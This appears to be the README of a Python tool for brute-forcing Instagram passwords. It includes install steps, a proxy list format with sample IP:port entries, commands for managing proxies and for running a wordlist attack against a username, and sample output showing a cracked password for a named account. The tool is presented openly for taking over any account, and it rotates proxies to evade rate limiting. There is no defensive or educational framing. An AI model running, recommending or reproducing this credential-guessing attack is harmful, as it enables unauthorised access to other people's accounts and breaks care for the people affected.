Bruteforce attack for Instagram.
This program will brute force any Instagram account you send it its way given a list of proxies.
I'm no longer maintaining this project.
It motivates me to keep updating this program.
Bitcoin Wallet: 3Kr5C9t9HWwPfqzSNXeBNyRvJWw9sSLeKy
PayPal: https://www.paypal.me/Msheikh03
pip install pipenv
Make sure you have Python 3.9 installed
pipenv --python 3.9
pipenv install
…
The system needs a list of proxies to work. Once uploaded, proxies are saved into a database.
Upload a list of proxies into the program. The proxy file must have a format of ip:port
proxies_list.txt
3.238.111.248:80
206.189.59.192:8118
165.22.81.30:34100
176.248.120.70:3128
191.242.178.209:3128
180.92.194.235:80
To upload a list of proxies a similar syntax must be followed.
python instagram.py -px <path to proxy list>
This gives an insight into the health of the proxies in the database.
python instagram.py --stats
This allows the able to get rid of proxies with a score below a given score.
It is recommended that you run the --stats and prune the database of proxies
who have a proxy score below Q1.
python instagram.py --prune 0.05
Pruning is not a requirement because the
the system will automatically learn which proxies perform poorly and stop using them.
python instagram.py -u <username> -p <passlist>
[-] Wordlist: passlist.txt
[-] Username: Sami09.1
[-] Password: 272
[-] Complete: 45.51%
[-] Attempts: 228
[-] Browsers: 273
[-] Exists: True
[-] Wordlist: passlist.txt
[-] Username: Sami09.1
[-] Password: Sami123
[-] Complete: 62.67%
[-] Attempts: 314
[-] Browsers: 185
[-] Exists: True
[!] Password Found
[+] Username: Sami09.1
[+] Password: Sami123
No open issues yet, or sync has not completed.